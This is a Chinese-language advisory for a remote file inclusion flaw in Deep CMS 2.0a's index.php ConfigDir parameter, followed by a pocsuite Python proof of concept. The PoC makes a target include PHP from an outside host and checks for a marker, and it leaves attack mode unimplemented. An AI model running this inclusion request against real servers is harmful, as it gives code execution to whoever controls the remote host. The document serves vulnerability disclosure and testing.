Deep CMS是一款基于PHP的内容管理程序。
Deep CMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。
问题是由于'index.php'脚本对用户提交的'ConfigDir'参数缺少过滤,提交恶意的远程服务器URL作为包含对象,可导致以WEB进程权限执行任意PHP代码(远程包含需目标PHP开启allow_url_include,否则仅能验证本地路径包含)。
受影响版本: Deep CMS 2.0a
目前没有详细解决方案提供,请关注以下链接:
<a href="http://wapcms.ru/" target="_blank">http://wapcms.ru/</a>
#!/usr/bin/env python
# coding: utf-8
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register
import re
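class TestPOC(POCBase):
    """pocsuite PoC for the Deep CMS 2.0a ``index.php?ConfigDir=`` remote file inclusion (SSV-1118).

    ``_verify`` makes the target include a remote PHP file whose only output is
    a known marker and reports success only when that marker appears in the
    response body.  ``_attack`` is deliberately a no-op (see its docstring).
    """

    vulID = '1118'  # ssvid
    version = '1.0'
    author = ['Disorder']
    vulDate = ''
    createDate = '2016-01-06'
    updateDate = '2016-01-06'
    references = ['http://www.sebug.net/vuldb/ssvid-1118']
    name = 'Deep CMS Index.PHP远程文件包含漏洞'
    appPowerLink = 'http://www.deep-cms.ru/'
    appName = 'Deep CMS'
    appVersion = 'Deep CMS 2.0a'
    vulType = 'Remote File Inclusion'
    desc = '''
    Deep CMS是一款基于PHP的内容管理程序。 Deep CMS不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'index.php'脚本对用户提交的'ConfigDir'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。
    '''
    samples = ['']

    # URL of the PHP file the target is made to include.  Its body is
    # ``<?php echo md5('3.1416');?>``, so a vulnerable target echoes
    # VERIFY_MARKER.  NOTE(review): this is a third-party host.  Whoever
    # controls it gets code execution on every target this PoC is run
    # against, and the check silently turns into a false negative if the
    # file disappears.  Point it at a file you host yourself (subclass or
    # override the attribute) before relying on the result.
    VERIFY_PAYLOAD_URL = 'http://tool.scanv.com/wsl/php_verify.txt?'
    # md5('3.1416')
    VERIFY_MARKER = 'd4d7a6b8b3ed8ed86db2ef2cd728d8ec'
    # Seconds to wait for the target.  Generous on purpose: the target has to
    # fetch VERIFY_PAYLOAD_URL itself before it can answer.
    REQUEST_TIMEOUT = 50

    def _attack(self):
        """Attack mode is not implemented; always report failure.

        Exploiting this RFI means running arbitrary PHP served from a host the
        operator controls, which this PoC does not automate.  An empty result
        makes ``parse_output`` emit a failure instead of a misleading success.
        """
        return self.parse_output({})

    def _verify(self):
        """Trigger the inclusion and look for VERIFY_MARKER in the response.

        Returns an :class:`Output` whose ``VerifyInfo`` carries ``self.url``
        on success.  A missing marker is inconclusive rather than proof of a
        patched target: PHP with ``allow_url_include=Off``, or a target that
        cannot reach VERIFY_PAYLOAD_URL, produces the same negative.
        """
        vulurl = '{url}/index.php?ConfigDir={evil}'.format(
            url=self.url, evil=self.VERIFY_PAYLOAD_URL)
        # Browser-looking headers.  The original PoC also forced
        # ``Host: www.google.com``; on a name-based virtual host that routes
        # the request to the default site instead of the one in ``self.url``
        # and yields a false negative, so the Host header is left to the
        # HTTP client, which derives it from the URL.
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Connection': 'keep-alive',
        }
        resp = req.get(vulurl, headers=headers, timeout=self.REQUEST_TIMEOUT)

        result = {}
        # ``resp.text`` is decoded text on both Python 2 and 3; ``resp.content``
        # is bytes on Python 3, where a str pattern search raises TypeError.
        if self.VERIFY_MARKER in resp.text:
            result['VerifyInfo'] = {'URL': self.url}
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in an :class:`Output`; a falsy result is reported as failure."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output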
# Hand the PoC class to pocsuite's register() (imported from pocsuite.utils)
# at import time so the framework can find it.
register(TestPOC)